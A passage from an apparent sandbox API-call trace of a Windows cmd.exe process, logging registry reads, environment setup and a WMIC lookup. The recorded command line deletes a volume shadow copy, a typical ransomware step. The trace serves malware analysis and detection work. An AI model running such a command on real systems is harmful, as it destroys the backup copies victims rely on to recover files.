AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.613] VirtualQuery (in: lpAddress=0x34000, lpBuffer=0x12f6f0, dwLength=0x30 | out: lpBuffer=0x12f6f0*(BaseAddress=0x34000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.613] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12f6f0, dwLength=0x30 | out: lpBuffer=0x12f6f0*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30 [0084.613] GetConsoleOutputCP () returned 0x1b5 [0084.613] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a27bfe0 | out: lpCPInfo=0x4a27bfe0) returned 1 [0084.614] SetConsoleCtrlHandler (HandlerRoutine=0x4a263184, Add=1) returned 1 [0084.614] _get_osfhandle (_FileHandle=1) returned 0x7 [0084.614] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0084.614] _get_osfhandle (_FileHandle=1) returned 0x7 [0084.614] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a26e194 | out: lpMode=0x4a26e194) returned 1 [0084.615] _get_osfhandle (_FileHandle=1) returned 0x7 [0084.615] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0084.615] _get_osfhandle (_FileHandle=0) returned 0x3 [0084.615] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a26e198 | out: lpMode=0x4a26e198) returned 1 [0084.615] _get_osfhandle (_FileHandle=0) returned 0x3 [0084.615] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0084.615] GetEnvironmentStringsW () returned 0x2e8b90* [0084.615] GetProcessHeap () returned 0x2d0000 [0084.615] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xa7c) returned 0x2e9620 [0084.616] FreeEnvironmentStringsW (penv=0x2e8b90) returned 1 [0084.616] GetProcessHeap () returned 0x2d0000 [0084.616] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x8) returned 0x2e8a10 [0084.616] GetEnvironmentStringsW () returned 0x2e8b90* [0084.616] GetProcessHeap () returned 0x2d0000 [0084.616] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xa7c) returned 0x2ea0b0 [0084.616] FreeEnvironmentStringsW (penv=0x2e8b90) returned 1 [0084.616] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e648 | out: phkResult=0x12e648*=0x44) returned 0x0 [0084.616] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e640, lpData=0x12e660, lpcbData=0x12e644*=0x1000 | out: lpType=0x12e640*=0x0, lpData=0x12e660*=0x18, lpcbData=0x12e644*=0x1000) returned 0x2 [0084.616] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e640, lpData=0x12e660, lpcbData=0x12e644*=0x1000 | out: lpType=0x12e640*=0x4, lpData=0x12e660*=0x1, lpcbData=0x12e644*=0x4) returned 0x0 [0084.616] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e640, lpData=0x12e660, lpcbData=0x12e644*=0x1000 | out: lpType=0x12e640*=0x0, lpData=0x12e660*=0x1, lpcbData=0x12e644*=0x1000) returned 0x2 [0084.616] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e640, lpData=0x12e660, lpcbData=0x12e644*=0x1000 | out: lpType=0x12e640*=0x4, lpData=0x12e660*=0x0, lpcbData=0x12e644*=0x4) returned 0x0 [0084.616] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e640, lpData=0x12e660, lpcbData=0x12e644*=0x1000 | out: lpType=0x12e640*=0x4, lpData=0x12e660*=0x40, lpcbData=0x12e644*=0x4) returned 0x0 [0084.617] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e640, lpData=0x12e660, lpcbData=0x12e644*=0x1000 | out: lpType=0x12e640*=0x4, lpData=0x12e660*=0x40, lpcbData=0x12e644*=0x4) returned 0x0 [0084.617] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e640, lpData=0x12e660, lpcbData=0x12e644*=0x1000 | out: lpType=0x12e640*=0x0, lpData=0x12e660*=0x40, lpcbData=0x12e644*=0x1000) returned 0x2 [0084.617] RegCloseKey (hKey=0x44) returned 0x0 [0084.617] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e648 | out: phkResult=0x12e648*=0x44) returned 0x0 [0084.617] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e640, lpData=0x12e660, lpcbData=0x12e644*=0x1000 | out: lpType=0x12e640*=0x0, lpData=0x12e660*=0x40, lpcbData=0x12e644*=0x1000) returned 0x2 [0084.617] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e640, lpData=0x12e660, lpcbData=0x12e644*=0x1000 | out: lpType=0x12e640*=0x4, lpData=0x12e660*=0x1, lpcbData=0x12e644*=0x4) returned 0x0 [0084.617] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e640, lpData=0x12e660, lpcbData=0x12e644*=0x1000 | out: lpType=0x12e640*=0x0, lpData=0x12e660*=0x1, lpcbData=0x12e644*=0x1000) returned 0x2 [0084.617] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e640, lpData=0x12e660, lpcbData=0x12e644*=0x1000 | out: lpType=0x12e640*=0x4, lpData=0x12e660*=0x0, lpcbData=0x12e644*=0x4) returned 0x0 [0084.617] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e640, lpData=0x12e660, lpcbData=0x12e644*=0x1000 | out: lpType=0x12e640*=0x4, lpData=0x12e660*=0x9, lpcbData=0x12e644*=0x4) returned 0x0 [0084.617] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e640, lpData=0x12e660, lpcbData=0x12e644*=0x1000 | out: lpType=0x12e640*=0x4, lpData=0x12e660*=0x9, lpcbData=0x12e644*=0x4) returned 0x0 [0084.617] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e640, lpData=0x12e660, lpcbData=0x12e644*=0x1000 | out: lpType=0x12e640*=0x0, lpData=0x12e660*=0x9, lpcbData=0x12e644*=0x1000) returned 0x2 [0084.617] RegCloseKey (hKey=0x44) returned 0x0 [0084.617] time (in: timer=0x0 | out: timer=0x0) returned 0x5f517439 [0084.617] srand (_Seed=0x5f517439) [0084.617] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'\" delete" [0084.617] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'\" delete" [0084.618] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a27c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0084.618] GetProcessHeap () returned 0x2d0000 [0084.618] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x218) returned 0x2eab40 [0084.618] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2eab50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0084.618] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a26f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0084.618] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a26f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0084.618] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a26f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0084.618] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0084.618] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0084.618] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0084.619] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0084.619] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0084.619] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0084.619] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0084.619] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0084.619] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0084.619] GetProcessHeap () returned 0x2d0000 [0084.619] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e9620 | out: hHeap=0x2d0000) returned 1 [0084.619] GetEnvironmentStringsW () returned 0x2e8b90* [0084.619] GetProcessHeap () returned 0x2d0000 [0084.619] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xa94) returned 0x2ead60 [0084.619] FreeEnvironmentStringsW (penv=0x2e8b90) returned 1 [0084.619] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a26f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0084.619] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a26f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0084.619] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0084.619] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0084.619] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0084.619] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0084.619] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0084.619] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0084.619] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0084.619] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0084.620] GetProcessHeap () returned 0x2d0000 [0084.620] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x5c) returned 0x2eb800 [0084.620] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f450 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0084.620] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x12f450, lpFilePart=0x12f430 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x12f430*="Desktop") returned 0x25 [0084.620] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0084.620] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f160 | out: lpFindFileData=0x12f160*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x2eb870 [0084.620] FindClose (in: hFindFile=0x2eb870 | out: hFindFile=0x2eb870) returned 1 [0084.620] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x12f160 | out: lpFindFileData=0x12f160*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x2eb870 [0084.620] FindClose (in: hFindFile=0x2eb870 | out: hFindFile=0x2eb870) returned 1 [0084.620] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0084.621] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x12f160 | out: lpFindFileData=0x12f160*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2516f480, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x2516f480, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x2eb870 [0084.621] FindClose (in: hFindFile=0x2eb870 | out: hFindFile=0x2eb870) returned 1 [0084.621] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0084.621] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0084.621] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0084.621] GetProcessHeap () returned 0x2d0000 [0084.621] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ead60 | out: hHeap=0x2d0000) returned 1 [0084.621] GetEnvironmentStringsW () returned 0x2eb870* [0084.621] GetProcessHeap () returned 0x2d0000 [0084.621] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xae8) returned 0x2ec360 [0084.621] FreeEnvironmentStringsW (penv=0x2eb870) returned 1 [0084.621] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a27c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0084.621] GetProcessHeap () returned 0x2d0000 [0084.621] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb800 | out: hHeap=0x2d0000) returned 1 [0084.621] GetProcessHeap () returned 0x2d0000 [0084.622] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x4016) returned 0x2ece50 [0084.622] GetProcessHeap () returned 0x2d0000 [0084.622] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xe4) returned 0x2e9680 [0084.622] GetProcessHeap () returned 0x2d0000 [0084.622] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ece50 | out: hHeap=0x2d0000) returned 1 [0084.622] GetConsoleOutputCP () returned 0x1b5 [0084.622] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a27bfe0 | out: lpCPInfo=0x4a27bfe0) returned 1 [0084.622] GetUserDefaultLCID () returned 0x409 [0084.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a277b50, cchData=8 | out: lpLCData=":") returned 2 [0084.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f560, cchData=128 | out: lpLCData="0") returned 2 [0084.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f560, cchData=128 | out: lpLCData="0") returned 2 [0084.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f560, cchData=128 | out: lpLCData="1") returned 2 [0084.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a28a740, cchData=8 | out: lpLCData="/") returned 2 [0084.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a28a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0084.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a28a460, cchData=32 | out: lpLCData="Tue") returned 4 [0084.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a28a420, cchData=32 | out: lpLCData="Wed") returned 4 [0084.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a28a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0084.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a28a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0084.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a28a360, cchData=32 | out: lpLCData="Sat") returned 4 [0084.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a28a700, cchData=32 | out: lpLCData="Sun") returned 4 [0084.623] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a277b40, cchData=8 | out: lpLCData=".") returned 2 [0084.623] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a28a4e0, cchData=8 | out: lpLCData=",") returned 2 [0084.624] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0084.624] GetProcessHeap () returned 0x2d0000 [0084.624] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x20c) returned 0x2e97e0 [0084.624] GetConsoleTitleW (in: lpConsoleTitle=0x2e97e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0084.627] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0084.627] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0084.627] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0084.627] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0084.628] GetProcessHeap () returned 0x2d0000 [0084.628] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x4012) returned 0x2ece50 [0084.628] GetProcessHeap () returned 0x2d0000 [0084.628] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ece50 | out: hHeap=0x2d0000) returned 1 [0084.631] _wcsicmp (_String1="C:\\Windows\\System32\\wbem\\WMIC.exe", _String2=")") returned 58 [0084.631] _wcsicmp (_String1="FOR", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0084.631] _wcsicmp (_String1="FOR/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0084.631] _wcsicmp (_String1="IF", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0084.631] _wcsicmp (_String1="IF/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0084.631] _wcsicmp (_String1="REM", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0084.631] _wcsicmp (_String1="REM/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0084.631] GetProcessHeap () returned 0x2d0000 [0084.631] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb0) returned 0x2e9a00 [0084.631] GetProcessHeap () returned 0x2d0000 [0084.631] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x54) returned 0x2e9ac0 [0084.634] GetProcessHeap () returned 0x2d0000 [0084.634] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x9e) returned 0x2e9b20 [0084.635] GetConsoleTitleW (in: lpConsoleTitle=0x12f470, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0084.635] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0084.635] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0084.635] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f000, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12efe0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12efe0*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0084.635] GetProcessHeap () returned 0x2d0000 [0084.636] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x218) returned 0x2e9bd0 [0084.636] GetProcessHeap () returned 0x2d0000 [0084.636] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xe2) returned 0x2e9df0 [0084.636] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0084.636] GetProcessHeap () returned 0x2d0000 [0084.636] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x420) returned 0x2d1320 [0084.636] SetErrorMode (uMode=0x0) returned 0x8001 [0084.636] SetErrorMode (uMode=0x1) returned 0x0 [0084.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\wbem\\.", nBufferLength=0x208, lpBuffer=0x2d1330, lpFilePart=0x12ed00 | out: lpBuffer="C:\\Windows\\System32\\wbem", lpFilePart=0x12ed00*="wbem") returned 0x18 [0084.636] SetErrorMode (uMode=0x8001) returned 0x1 [0084.636] GetProcessHeap () returned 0x2d0000 [0084.636] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2d1320, Size=0x54) returned 0x2d1320 [0084.636] GetProcessHeap () returned 0x2d0000 [0084.636] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2d1320) returned 0x54 [0084.636] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\System32\\wbem\\.") returned 1 [0084.636] GetProcessHeap () returned 0x2d0000 [0084.637] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x48) returned 0x2e9ee0 [0084.637] GetProcessHeap () returned 0x2d0000 [0084.637] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x7c) returned 0x2e9f30 [0084.637] GetProcessHeap () returned 0x2d0000 [0084.637] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2e9f30, Size=0x48) returned 0x2e9f30 [0084.637] GetProcessHeap () returned 0x2d0000 [0084.637] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e9f30) returned 0x48 [0084.637] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a26f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0084.637] GetProcessHeap () returned 0x2d0000 [0084.637] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xe8) returned 0x2e9f90 [0084.641] GetProcessHeap () returned 0x2d0000 [0084.641] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2e9f90, Size=0x7e) returned 0x2e9f90 [0084.641] GetProcessHeap () returned 0x2d0000 [0084.641] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e9f90) returned 0x7e [0084.643] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0084.643] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\wbem\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x12ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ea70) returned 0x2ea020 [0084.643] GetProcessHeap () returned 0x2d0000 [0084.643] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x28) returned 0x2e46c0 [0084.643] FindClose (in: hFindFile=0x2ea020 | out: hFindFile=0x2ea020) returned 1 [0084.643] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0084.643] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0084.643] GetConsoleTitleW (in: lpConsoleTitle=0x12efc0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0084.643] InitializeProcThreadAttributeList (in: lpAttributeList=0x12ed78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12ed38 | out: lpAttributeList=0x12ed78, lpSize=0x12ed38) returned 1 [0084.643] UpdateProcThreadAttribute (in: lpAttributeList=0x12ed78, dwFlags=0x0, Attribute=0x60001, lpValue=0x12ed28, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12ed78, lpPreviousValue=0x0) returned 1 [0084.644] GetStartupInfoW (in: lpStartupInfo=0x12ee90 | out: lpStartupInfo=0x12ee90*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0084.644] GetProcessHeap () returned 0x2d0000 [0084.644] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x20) returned 0x2e46f0 [0084.644] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0084.644] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0084.644] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0084.644] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0084.644] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0084.644] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0084.644] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0084.644] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0084.644] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0084.644] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0084.644] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0084.644] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0084.644] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0084.644] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0084.644] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0084.644] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0084.644] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0084.644] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0084.644] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0084.644] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0084.644] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0084.644] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0084.645] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0084.645] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0084.645] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0084.645] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0084.645] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0084.645] 